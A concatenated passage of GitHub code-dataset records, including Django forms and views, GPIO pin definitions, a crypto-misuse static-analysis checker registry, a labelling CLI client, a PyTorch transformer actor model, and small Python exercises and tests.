InterviewScheduleForm(forms.ModelForm):\n class Meta:\n model=InterviewSchedule\n fields=\"__all__\"","repo_name":"DharmeshRS/HR_Management_System","sub_path":"HRMS/Manager/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43301068571","text":"FONT_HEIGHT=12\nGPIO_START=20 # this is active high\nGPIO_FUNC=16 # this is active low\nGPIO_BSIM=26 # when high, the battery simulator is powered on\nGPIO_ISENSE=19 # when high, current sense mode is high\nGPIO_VBUS=21 # when high VBUS is applied to DUT\nGPIO_UART_SOC=18 # when high, the UART is routed to the SoC; when low, to the EC\nGPIO_PROG_B=24 # when low, the FPGA PROG_B line is asserted\nGPIO_CRESET_N=25 # when low, the EC reset line is asserted\nGPIO_AUD_HPR=0 # when high, the right headphone is looped back to the mic\nGPIO_AUD_HPL=5 # when high, the left headphone is looped back to the mic\nGPIO_AUD_SPK=26 # when high, the speaker output is looped back to the mic. Note left digital channel == speaker\nGPIO_VIBE_SENSE=13 # when low, the vibe motor is being driven\n\nGPIO_DRV_UP5K_N=23\nGPIO_UP5K_MOSI=10\nGPIO_UP5K_MISO=9\nGPIO_UP5K_SCK=11\nGPIO_UP5K_CSN=8\n\nGPIO_JTAG_TCK=4\nGPIO_JTAG_TMS=17\nGPIO_JTAG_TDI=27\nGPIO_JTAG_TDO=22\n\n\nHAT_RED_LED = 12\nHAT_GREEN_LED = 16\nHAT_WHITE_LED = 20\nHAT_START = 7\n\n","repo_name":"betrusted-io/bootstrap-mainboard","sub_path":"gpiodefs.py","file_name":"gpiodefs.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"34496620564","text":"from .constant_keys import ConstantKeysChecker\nfrom .constant_salts import ConstantSaltsChecker\nfrom .constant_ivs import ConstantIVsChecker\nfrom .pbe_iterations import PBEIterationsChecker\nfrom .rsa_key_sizes import RSAKeySizesChecker\nfrom .unsafe_evp_algorithms import UnsafeEVPAlogirthmsChecker\nfrom .unsafe_algorithms import UnsafeAlgorithmsChecker\n\n\nclass CheckerPrototype:\n def __init__(self, name, desc, criteria):\n self.name = name\n self.desc = desc\n self.criteria = criteria\n\n\ndefault_checkers = {\n ConstantKeysChecker: [\n (\"crypt\", 0),\n (\"DES_crypt\", 0),\n (\"DES_fcrypt\", 0),\n (\"EVP_CipherInit\", 2),\n (\"EVP_EncryptInit\", 2),\n (\"EVP_DecryptInit\", 2),\n (\"EVP_CipherInit_ex\", 3),\n (\"EVP_EncryptInit_ex\", 3),\n (\"EVP_DecryptInit_ex\", 3),\n (\"EVP_CipherInit_ex2\", 2),\n (\"EVP_EncryptInit_ex2\", 2),\n (\"EVP_DecryptInit_ex2\", 2),\n (\"AES_set_encrypt_key\", 0),\n (\"AES_set_decrypt_key\", 0),\n (\"DES_set_key\", 0),\n ],\n ConstantSaltsChecker: [\n (\"crypt\", 1),\n (\"DES_crypt\", 1),\n (\"DES_fcrypt\", 1),\n (\"EVP_BytesToKey\", 2),\n ],\n ConstantIVsChecker: [\n (\"EVP_CipherInit\", 3),\n (\"EVP_EncryptInit\", 3),\n (\"EVP_DecryptInit\", 3),\n (\"EVP_CipherInit_ex\", 4),\n (\"EVP_EncryptInit_ex\", 4),\n (\"EVP_DecryptInit_ex\", 4),\n (\"EVP_CipherInit_ex2\", 3),\n (\"EVP_EncryptInit_ex2\", 3),\n (\"EVP_DecryptInit_ex2\", 3),\n (\"AES_cbc_encrypt\", 4),\n ],\n PBEIterationsChecker: [(\"EVP_BytesToKey\", 5)],\n RSAKeySizesChecker: [\n (\"EVP_RSA_gen\", 0),\n (\"RSA_generate_key_ex\", 1),\n (\"RSA_generate_multi_prime_key\", 1),\n (\"EVP_RSA_gen_key\", 0),\n ],\n UnsafeEVPAlogirthmsChecker: [\n (\"EVP_BytesToKey\", 0),\n (\"EVP_CipherInit\", 1),\n (\"EVP_EncryptInit\", 1),\n (\"EVP_DecryptInit\", 1),\n (\"EVP_CipherInit_ex\", 1),\n (\"EVP_EncryptInit_ex\", 1),\n (\"EVP_DecryptInit_ex\", 1),\n (\"EVP_CipherInit_ex2\", 1),\n (\"EVP_EncryptInit_ex2\", 1),\n (\"EVP_DecryptInit_ex2\", 1),\n (\"EVP_DigestInit\", 1),\n (\"EVP_DigestInit_ex\", 1),\n (\"EVP_DigestInit_ex2\", 1),\n ],\n UnsafeAlgorithmsChecker: [\n (\"AES_ecb_encrypt\", 0),\n (\"DES_ecb_encrypt\", 0),\n (\"DES_ecb2_encrypt\", 0),\n (\"DES_ecb3_encrypt\", 0),\n (\"SHA1\", 0),\n (\"SHA1_Init\", 0),\n (\"MD2\", 0),\n (\"MD2_Init\", 0),\n (\"MD4\", 0),\n (\"MD4_Init\", 0),\n (\"MD5\", 0),\n (\"MD5_Init\", 0),\n # (\"EVP_aes_128_ecb\", 0),\n # (\"EVP_aes_192_ecb\", 0),\n # (\"EVP_aes_256_ecb\", 0)\n ],\n}\n\ntarget_apis = set()\nfor _, criteria in default_checkers.items():\n for func_name, _ in criteria:\n target_apis.add(func_name)\n","repo_name":"bluesadi/Yasat","sub_path":"Yasat/checkers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33155300379","text":"\nimport argparse\nfrom smartlabel.Dataset import Dataset\nfrom smartlabel.Project import Project\nfrom smartlabel.Label import Label_Object\nfrom tabulate import tabulate\nimport sys\nimport requests\nimport json\nfrom pathlib import Path\nfrom os.path import join\nimport os\nfrom shutil import rmtree\n\nAPI_URL = 'http://127.0.0.1:5000/'\nhome = str(Path.home())\nCONFIG_FILE_FOLDER = join(home, '.smartlabel')\nCONFIG_FILE_PATH = join(CONFIG_FILE_FOLDER, 'config')\n\n\ndocstring = \"*\"*99 + \"\"\" Smartlabel command line interface.\n\"\"\" + \"*\"*99\nparser = argparse.ArgumentParser(description=docstring)\n\nparser.add_argument(\"--login\", default=argparse.SUPPRESS, nargs=2, help=\"Enter two arguments, api key and api seceret.\")\nparser.add_argument(\"--logout\", default=argparse.SUPPRESS, nargs=\"?\")\n\nparser.add_argument(\"--list-projects\", default=argparse.SUPPRESS, nargs='?')\nparser.add_argument(\"--get-project\", default=argparse.SUPPRESS, nargs='?')\nparser.add_argument(\"--create-project\", default=argparse.SUPPRESS, nargs=1)\nparser.add_argument(\"--create-dataset\", default=argparse.SUPPRESS, nargs=1)\nparser.add_argument(\"--create-dataset-rows-from-directory\", default=argparse.SUPPRESS, nargs=1)\nparser.add_argument(\"--create-dataset-row-from-s3\", default=argparse.SUPPRESS, nargs=1, type=str)\nparser.add_argument(\"--create-dataset-row-from-csv\", default=argparse.SUPPRESS, nargs=1, type=str)\nparser.add_argument(\"--create-dataset-row-from-txt\", default=argparse.SUPPRESS, nargs=1, type=str)\nparser.add_argument(\"--create-dataset-row-from-image\", default=argparse.SUPPRESS, nargs=1, type=str)\n\nparser.add_argument(\"--connect-dataset-to-project\", default=argparse.SUPPRESS, nargs=1)\n\n# TODO: add argparse support to the module\n# TODO: https://github.com/talha888/smartlabel/issues/1\n\ndef get_token():\n if not os.path.exists(CONFIG_FILE_PATH):\n return False\n try:\n with open(CONFIG_FILE_PATH, 'r') as f:\n token = json.load(f)\n return token['token']\n except Exception as e:\n return False\n\ndef main():\n args, leftovers = parser.parse_known_args()\n \n if hasattr(args, 'logout'):\n result = input(\"Are you sure? [Y/N]\")\n result = result.lower()\n if result == 'y' or result == 'yes':\n rmtree(CONFIG_FILE_FOLDER)\n else:\n print('Could not logout.')\n sys.exit(0)\n\n\n token = get_token()\n if not token:\n if hasattr(args, 'login'):\n try:\n key, seceret = args.login\n result = requests.post(f\"{API_URL}/get_token\", json={\"API_KEY\": key, \"API_SECERET\": seceret})\n token = json.loads(result.text)\n data = {\"API_KEY\": key, \"API_SECERET\": seceret, 'token': token['token']}\n if not os.path.exists(CONFIG_FILE_PATH):\n os.mkdir(join(home, '.smartlabel'))\n with open(CONFIG_FILE_PATH, 'w') as f:\n json.dump(data, f)\n print('Welcome --- ')\n sys.exit(0) \n except Exception as e:\n print('ERROR', e)\n \n print('Use --login to create a token so you can communicate with serer.')\n sys.exit(0)\n \n headers = {'x-access-token': token}\n if hasattr(args, 'list_projects'):\n if args.list_projects is None:\n try:\n res = requests.get(f\"{API_URL}/list_projects\", headers=headers)\n project_list = json.loads(res.text)\n print(project_list)\n except Exception as e:\n pass\n # project = Project()\n # table, columns= project.get_projects()\n # if table != 0:\n # output = tabulate(table, columns , tablefmt=\"psql\")\n # print(output)\n # else:\n # print(\"-----------------NO RECORD FOUND-----------------\")\n else:\n parser.print_help\n\n elif hasattr(args, 'get_project'):\n Id = args.get_project\n project = Project()\n table, columns= project.get_project(Id)\n if table != 0:\n output = tabulate(table, columns , tablefmt=\"psql\")\n print(output)\n else:\n print(\"-----------------TRY WITH VALID ID-----------------\")\n \n elif hasattr(args, 'create_project'):\n if args.create_project is not None:\n Createdby,DatasetId, Name, Description, Status, Role = input(\"Enter the following data Createdby,DatasetId, Name, Description, Status, Role: \").split() \n project = Project()\n project.create_project(Createdby,DatasetId, Name, Description, Status, Role)\n else:\n print(\"-----------------Invalid entry-----------------\")\n \n elif hasattr(args, 'create_dataset'):\n # TODO: list create a new dataset and return a line with its meta data.\n print(args)\n elif hasattr(args, 'create_dataset_row_from_csv'):\n # TODO: list create a new dataset and return a line with its meta data.\n print('all files have been uploaded to dataset')\n\n\nif __name__ == '__main__':\n main()","repo_name":"talha888/smartlabel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34132983565","text":"class Kolor:\n\n #opis stanu - konstruktor klasy\n def __init__(self,id,nazwa):\n self.idkoloru = id # zmienna -> parametr\n self.nazwa = nazwa\n self.paleta = \"paleta A\"\n\n #zachowane-funkcje klasy -> metody\n\n def print_kolor(self):\n print(f'kolor: {self.nazwa}, id koloru: {self.idkoloru}, paleta: {self.paleta}')\n\n\nk1 = Kolor(2,\"czerwony\")\nk1.print_kolor()\n\nk2 = Kolor(99,\"czarny\")\nk2.paleta = \"paleta X\"\nk2.print_kolor()\n\nk1.print_kolor()\n","repo_name":"albim72/PYTHON_PODSTAWY_99","sub_path":"OBIEKTY/kolory.py","file_name":"kolory.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5571147340","text":"import math\nimport torch\nimport torch.nn as nn\nimport transformers\n\nfrom config import cfg\nfrom utils import model as tu\nfrom algos.transformer.transformer_layer import TransformerEncoderLayerResidual, TransformerDecoderLayer\nfrom algos.transformer.decoder import TransformerDecoder\nfrom algos.transformer.encoder import TransformerEncoder\nfrom algos.gpt2.gpt2_model import GPT2Model\n\nclass MetamorphformerActor(nn.Module):\n def __init__(self, model_args, limb_embeders, pos_embedders, timestep_embeder, morphology_encoder, extreo_embeders=None, method='metamorphformer', device=None):\n super(MetamorphformerActor, self).__init__()\n self.device = device\n self.method = method\n self.model_args = model_args\n\n self.envs = self.model_args.envs\n self.morph_emb_dim = self.model_args.morph_emb_dim\n self.latent_emb_dim = self.model_args.latent_emb_dim\n #print('self.latent_emb_dim = %i in actor' % self.latent_emb_dim)\n\n self.nums_joint, self.dims_proprioceptive, self.dims_bodypart_proprioceptive, self.dims_exteroceptive, self.dims_action, self.dims_bodypart_act = self.model_args.dim_specs\n\n self.limb_embeders = limb_embeders\n self.extreo_embeders = extreo_embeders\n self.pos_embedders = pos_embedders\n self.timestep_embeder = timestep_embeder\n self.morphology_encoder = morphology_encoder\n\n # task-specific modules\n self.limb_act_embeders = nn.ModuleDict({\n 'unimal': nn.Linear(self.dims_bodypart_act['unimal'], self.morph_emb_dim),\n 'walker': nn.Linear(self.dims_bodypart_act['walker'], self.morph_emb_dim),\n 'ant': nn.Linear(self.dims_bodypart_act['ant'], self.morph_emb_dim),\n 'walker2d': nn.Linear(self.dims_bodypart_act['walker2d'], self.morph_emb_dim),\n 'halfcheetah': nn.Linear(self.dims_bodypart_act['halfcheetah'], self.morph_emb_dim),\n 'swimmer': nn.Linear(self.dims_bodypart_act['swimmer'], self.morph_emb_dim),\n 'reacher': nn.Linear(self.dims_bodypart_act['reacher'], self.morph_emb_dim),\n 'hopper': nn.Linear(self.dims_bodypart_act['hopper'], self.morph_emb_dim),\n 'humanoid': nn.Linear(self.dims_bodypart_act['humanoid'], self.morph_emb_dim)\n })\n self.action_projectors = nn.ModuleDict({\n 'unimal': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['unimal']], final_nonlinearity=False, ),\n 'walker': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['walker']], final_nonlinearity=False, ),\n 'ant': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['ant']], final_nonlinearity=False, ),\n 'walker2d': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['walker2d']], final_nonlinearity=False, ),\n 'halfcheetah': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['halfcheetah']], final_nonlinearity=False, ),\n 'swimmer': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['swimmer']], final_nonlinearity=False, ),\n 'reacher': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['reacher']], final_nonlinearity=False, ),\n 'hopper': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['hopper']], final_nonlinearity=False, ),\n 'humanoid': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_action['humanoid']], final_nonlinearity=False, )\n })\n self.obs_projectors = nn.ModuleDict({\n 'unimal': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['unimal']], final_nonlinearity=False, ),\n 'walker': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['walker']], final_nonlinearity=False, ),\n 'ant': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['ant']], final_nonlinearity=False, ),\n 'walker2d': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['walker2d']], final_nonlinearity=False, ),\n 'halfcheetah': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['halfcheetah']], final_nonlinearity=False, ),\n 'swimmer': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['swimmer']], final_nonlinearity=False, ),\n 'reacher': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['reacher']], final_nonlinearity=False, ),\n 'hopper': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['hopper']], final_nonlinearity=False, ),\n 'humanoid': tu.make_mlp_default([self.latent_emb_dim] + self.model_args.DECODER_DIMS + [self.dims_proprioceptive['humanoid']], final_nonlinearity=False, )\n })\n self.morphology_to_pose_projectors = nn.ModuleDict({\n 'unimal': tu.make_mlp_default([self.nums_joint['unimal']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'walker': tu.make_mlp_default([self.nums_joint['walker']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'ant': tu.make_mlp_default([self.nums_joint['ant']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'walker2d': tu.make_mlp_default([self.nums_joint['walker2d']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'halfcheetah': tu.make_mlp_default([self.nums_joint['halfcheetah']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'swimmer': tu.make_mlp_default([self.nums_joint['swimmer']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'reacher': tu.make_mlp_default([self.nums_joint['reacher']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'hopper': tu.make_mlp_default([self.nums_joint['hopper']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, ),\n 'humanoid': tu.make_mlp_default([self.nums_joint['humanoid']*self.morph_emb_dim] + self.model_args.DECODER_DIMS + [self.latent_emb_dim], final_nonlinearity=False, )\n })\n\n # shared modules\n self.s_a_cross = True\n if self.s_a_cross:\n self.decoder_layer = TransformerDecoderLayer(self.morph_emb_dim, self.model_args.NHEAD, self.model_args.DIM_FEEDFORWARD, self.model_args.DROPOUT)\n self.morphology_decoder = TransformerDecoder(self.decoder_layer, 1, norm=None, )\n\n self.ln_w_current_pose = True\n #if self.ln_w_current_pos:\n # self.seq_t_linear_weighter = nn.Linear(2 * self.morph_len * decoder_out_dim, self.morph_len * decoder_out_dim) # 52 => 128\n\n if cfg.MODEL.TIME_SEQ_MODEL == 'OrgEncoder':\n latent_encode_layer = TransformerEncoderLayerResidual(2 * self.latent_emb_dim, self.model_args.NHEAD, self.model_args.DIM_FEEDFORWARD, self.model_args.DROPOUT)\n self.latent_encoder = TransformerEncoder(latent_encode_layer, 1, norm=None, )\n elif cfg.MODEL.TIME_SEQ_MODEL == 'GPT2':\n if transformers.__version__ == '4.5.1':\n GPT2config = transformers.GPT2Config(\n vocab_size=1, # doesn't matter -- we don't use the vocab\n n_embd=2 * self.latent_emb_dim,\n n_layer=1,\n n_head=self.model_args.NHEAD,\n n_inner=4 * self.latent_emb_dim,\n activation_function='relu',\n n_positions=1024,\n resid_pdrop=self.model_args.DROPOUT,\n attn_pdrop=self.model_args.DROPOUT,\n # **kwargs\n )\n else:\n GPT2config = transformers.GPT2Config(\n vocab_size=1, # doesn't matter -- we don't use the vocab\n n_embd=2 * self.latent_emb_dim,\n n_layer=1,\n n_head=self.model_args.NHEAD,\n n_inner=4 * self.latent_emb_dim,\n activation_function='relu',\n n_ctx=1024,\n resid_pdrop=self.model_args.DROPOUT,\n attn_pdrop=self.model_args.DROPOUT,\n # **kwargs\n )\n self.latent_encoder = GPT2Model(GPT2config)\n else:\n raise NotImplementedError\n\n if cfg.MODE != 'pretrain' and cfg.MODEL.ACTOR_CRITIC_SHARE:\n self.value_projector = tu.make_mlp_default([self.morph_emb_dim] + self.model_args.DECODER_DIMS + [1], final_nonlinearity=False, ) # [128, J]\n\n # init weights\n self.init_weights()\n return\n\n def init_weights(self):\n initrange = self.model_args.EMBED_INIT\n\n for env in self.envs:\n self.limb_act_embeders[env].weight.data.uniform_(-initrange, initrange)\n\n #if self.ln_w_current_pose:\n # self.seq_t_linear_weighter.weight.data.uniform_(-initrange, initrange)\n\n initrange = self.model_args.DECODER_INIT\n for env in self.envs:\n self.action_projectors[env][-1].weight.data.uniform_(-initrange, initrange)\n self.action_projectors[env][-1].bias.data.zero_()\n\n self.obs_projectors[env][-1].weight.data.uniform_(-initrange, initrange)\n self.obs_projectors[env][-1].bias.data.zero_()\n\n # self.morphology_to_pose_projectors[env][-1].weight.data.uniform_(-initrange, initrange)\n # self.morphology_to_pose_projectors[env][-1].bias.data.zero_()\n\n if cfg.MODE != 'pretrain' and cfg.MODEL.ACTOR_CRITIC_SHARE:\n self.value_projector[-1].weight.data.uniform_(-initrange, initrange)\n self.value_projector[-1].bias.data.zero_()\n\n return\n\n\n def encode_morphology(self, embeder, pos_embedder, morphology_to_pose_projector, num_joint, inputs, mask=None, seq_mask=None):\n '''\n encode the morphology\n :param inputs: shape=[num_samples,num_joints*nvar_per_joint]\n :param masks: shape=[num_samples,num_joints*nvar_per_joint]\n :return: morphology_embed, shape=[num_limbs,batch_size,embed_dim]\n '''\n if mask is not None:\n inputs = (1.0 - mask)*inputs\n morph_inputs = inputs.reshape(inputs.shape[0], num_joint, -1).permute(1, 0, 2) # shape = [num_sample, num_joint, nvar_per_joint] => [num_joint, num_sample, nvar_per_joint]\n\n morph_embed = embeder(morph_inputs) * math.sqrt(self.morph_emb_dim) # [num_joint, num_sample, nvar_per_joint] -> [num_joint, num_sample, emb_dim]\n morph_embed = pos_embedder(morph_embed) # shape = [num_joint, num_sample, emb_dim]\n\n if seq_mask is not None:\n seq_mask = seq_mask.bool()\n pre_pose_embed = self.morphology_encoder(morph_embed, src_key_padding_mask=seq_mask).permute(1, 0, 2) # shape = [num_joint, num_sample, morph_emb_dim] => [num_sample, num_joint, morph_emb_dim]\n pose_embed = pre_pose_embed.reshape(pre_pose_embed.shape[0], -1) # shape = [num_sample, num_joint*morph_emb_dim]\n pose_embed = morphology_to_pose_projector(pose_embed) # shape = [num_sample, latent_emb_dim]\n return pose_embed, pre_pose_embed\n\n def forward(self, proprioceptive, exteroceptive, act_prev, rew_prev, obs_mask=None, act_mask=None, obs_joint_mask=None, act_joint_mask=None, timemask=None, timestep=None, env=None):\n '''\n\n :param proprioceptive: shape = [batch_size, T, dim_proprioceptive]\n :param exteroceptive: shape = [batch_size, T, dim_exteroceptive]\n :param act_prev: shape = [batch_size, T, dim_action]\n :param rew_prev: shape = [batch_size, T, 1]\n :param obs_mask: shape = [batch_size, T, dim_proprioceptive]\n :param act_mask: shape = [batch_size, T, dim_action]\n :param obs_joint_mask: shape = [batch_size, T, num_joint]\n :param act_joint_mask: shape = [batch_size, T, num_joint]\n :param timemask: shape = [batch_size, T]\n :param timestep: shape = [batch_size, T]\n :return:\n '''\n has_exteroceptive = exteroceptive is not None and exteroceptive.shape[-1] > 0\n\n for the_env in self.envs:\n if the_env == env:\n self.limb_embeders[the_env].train()\n self.pos_embedders[the_env].train()\n self.limb_act_embeders[the_env].train()\n self.action_projectors[the_env].train()\n self.obs_projectors[the_env].train()\n self.morphology_to_pose_projectors[the_env].train()\n if has_exteroceptive:\n self.extreo_embeders[the_env].train()\n else:\n self.extreo_embeders[the_env].eval()\n else:\n self.limb_embeders[the_env].eval()\n self.pos_embedders[the_env].eval()\n self.limb_act_embeders[the_env].eval()\n self.action_projectors[the_env].eval()\n self.obs_projectors[the_env].eval()\n self.morphology_to_pose_projectors[the_env].eval()\n self.extreo_embeders[the_env].eval()\n\n batch_size = proprioceptive.shape[0]\n window_size = proprioceptive.shape[1]\n\n proprioceptive_all = proprioceptive.reshape(batch_size * window_size, proprioceptive.shape[-1])\n obs_mask_all = obs_mask.reshape(batch_size * window_size, obs_mask.shape[-1]) if obs_mask is not None else None\n obs_joint_mask_all = obs_joint_mask.reshape(batch_size * window_size, obs_joint_mask.shape[-1]) if obs_joint_mask is not None else None\n pose_embed_proprioceptive_all, pre_pose_embed_proprioceptive_all = self.encode_morphology(self.limb_embeders[env], self.pos_embedders[env], self.morphology_to_pose_projectors[env], self.nums_joint[env], proprioceptive_all, obs_mask_all, obs_joint_mask_all) # shape = [batch_size*window_size, num_joints, morph_emb_dim]\n pose_embed_proprioceptive = pose_embed_proprioceptive_all.reshape(batch_size, window_size, self.latent_emb_dim) # shape = [batch_size, window_size, latent_emb_dim]\n pre_pose_embed_proprioceptive = pre_pose_embed_proprioceptive_all.reshape(batch_size, window_size, self.nums_joint[env], self.morph_emb_dim)\n\n act_prev_all = act_prev.reshape(batch_size * window_size, act_prev.shape[-1])\n act_mask_all = act_mask.reshape(batch_size * window_size, act_mask.shape[-1]) if act_mask is not None else None\n act_joint_mask_all = act_joint_mask.reshape(batch_size * window_size, act_joint_mask.shape[-1]) if act_joint_mask is not None else None\n pose_embed_act_prev_all, _ = self.encode_morphology(self.limb_act_embeders[env], self.pos_embedders[env], self.morphology_to_pose_projectors[env], self.nums_joint[env], act_prev_all, act_mask_all, act_joint_mask_all) # shape = [batch_size*window_size, num_joints, morph_emb_dim]\n pose_embed_act_prev = pose_embed_act_prev_all.reshape(batch_size, window_size, self.latent_emb_dim) # shape = [batch_size, window_size, latent_emb_dim]\n\n z_a = pose_embed_act_prev\n z_s = pose_embed_proprioceptive\n\n # exteroceptive\n if not cfg.MODEL.EXTERO_BLIND and has_exteroceptive:\n pose_embed_exteroceptive = self.extreo_embeders[env](exteroceptive)\n z_s += pose_embed_exteroceptive\n\n s_a_joint_dim = -2\n nvar_timestep = 2 # s and a\n z = torch.cat([z_a.unsqueeze(s_a_joint_dim), z_s.unsqueeze(s_a_joint_dim)], dim=s_a_joint_dim) # shape = [batch_size, window_size, nvar_timestep, latent_emb_dim]\n\n if cfg.MODEL.USE_TIMESTEPS and self.timestep_embeder is not None:\n time_embeddings = self.timestep_embeder(timestep.int()).unsqueeze(2) # shape = [batch_size, window_size] => [batch_size, window_size, latent_emb_dim] => [batch_size, window_size, num_joint, 1, latent_emb_dim]\n z = z + time_embeddings # shape = [window_size, batch_size, num_joints, nvar_timestep, latent_emb_dim]\n\n decoder_input = z.reshape(batch_size, window_size, -1) # shape = [ batch_size, window_size, nvar_timestep*latent_emb_dim]\n\n if cfg.MODEL.TIME_SEQ_MODEL == 'OrgEncoder':\n latent_attn_mask = None # some issue with latent_attn_mask\n decoder_output = self.latent_encoder(decoder_input.permute(1, 0, 2), mask=latent_attn_mask, src_key_padding_mask=timemask.float()) # [T, 32, 12*2*128] => [T, 32, 12*2*128]\n decoder_output = decoder_output.permute(1, 0, 2) # [T, 32, 12, 2, 128]\n elif cfg.MODEL.TIME_SEQ_MODEL == 'GPT2':\n decoder_outputs = self.latent_encoder(inputs_embeds=decoder_input, attention_mask=1.0-timemask.float()) # TODO reverse mask definition in GPT2Model!!!\n decoder_output = decoder_outputs['last_hidden_state'] # shape = [batch_size, window_size, nvar_timestep*latent_emb_dim]\n else:\n raise NotImplementedError\n decoder_output = decoder_output.reshape(batch_size, window_size, nvar_timestep, self.latent_emb_dim) # shape = [batch_size, window_size, nvar_timestep, latent_emb_dim]\n\n z_a_out = decoder_output[:, :, 0, :] # shape = [batch_size, window_size, latent_emb_dim]\n z_s_out = decoder_output[:, :, 1, :] # shape = [batch_size, window_size, latent_emb_dim]\n\n # from a_prev to s\n obs_preds = self.obs_projectors[env](z_a_out) # shape = [batch_size, window_size, dim_proprioceptive]\n if obs_mask is not None:\n obs_preds = (1.0 - obs_mask) * obs_preds\n # from s to a\n action_preds = self.action_projectors[env](z_s_out) # shape = [batch_size, window_size, dim_action]\n if act_mask is not None:\n action_preds = (1.0 - act_mask) * action_preds\n\n if cfg.MODE != 'pretrain' and cfg.MODEL.ACTOR_CRITIC_SHARE:\n value_preds = self.value_projector(pre_pose_embed_proprioceptive).reshape(batch_size, window_size, -1) # shape = [batch_size, window_size, num_joints, 1] => [batch_size, window_size, num_joints]\n if act_joint_mask is not None:\n value_preds = (1.0 -act_joint_mask) * value_preds\n return action_preds, obs_preds, value_preds\n return action_preds, obs_preds\n","repo_name":"AaronJi/OnlineDecisionMetaMorphFormer","sub_path":"algos/metamorphformer/metamorphformer_actor.py","file_name":"metamorphformer_actor.py","file_ext":"py","file_size_in_byte":18979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6357490832","text":"#Exercício Python 63: Escreva um programa que leia um número N inteiro qualquer e mostre na tela os N primeiros elementos de uma Sequência de Fibonacci\nprint('Sequencia de fibonacci')\ncont = 3\nn = int(input('Digite qauntos termos voce quer mostrar:'))\nt1 = 0\nt2 = 1\nt3 = t1 + t2\nprint(t1,t2,end=' ')\nwhile cont != n:\n cont +=1\n print('{}'.format(t3),end=' ')\n t1 = t2\n t2 = t3\n t3 = t1 + t2\n","repo_name":"RafaelVelhoGarcia/study-exercice-py","sub_path":"ex063.py","file_name":"ex063.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12530666982","text":"import unittest\n\nfrom src.Caesar import Caesar\n\nclass TestCaesar(unittest.TestCase):\n\n def test_cipher(self):\n M = \"hello world !!!\"\n K = 125\n caesar = Caesar(K)\n self.assertNotEqual(caesar.cipher(M), M)\n\n def test_decipher(self):\n M = \"hello world 33 45 #ÉÉ~~^$!!!\"\n K = 213\n caesar = Caesar(K)\n self.assertEqual(caesar.decipher(caesar.cipher(M)), M)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ntnprdhmm/cryptology","sub_path":"tests/test_caesar.py","file_name":"test_caesar.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3472221045","text":"\n\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n# для группы премиум\nfrom django.shortcuts import redirect \nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.decorators import login_required\n\nfrom news.models import *\nfrom news.views import *\n\n\nclass IndexView(LoginRequiredMixin, TemplateView):\n template_name = 'protect/index_user.html'# Create your views here.\n \n \n \n \n # определение есть ли пользователь в группе\n # получаем весь контекст\n # exists() выберет из всего контекста пользователя со всеми его группами если есть премиум\n # но not переворачивает наоборот\n \n \n def get_context_data(self, 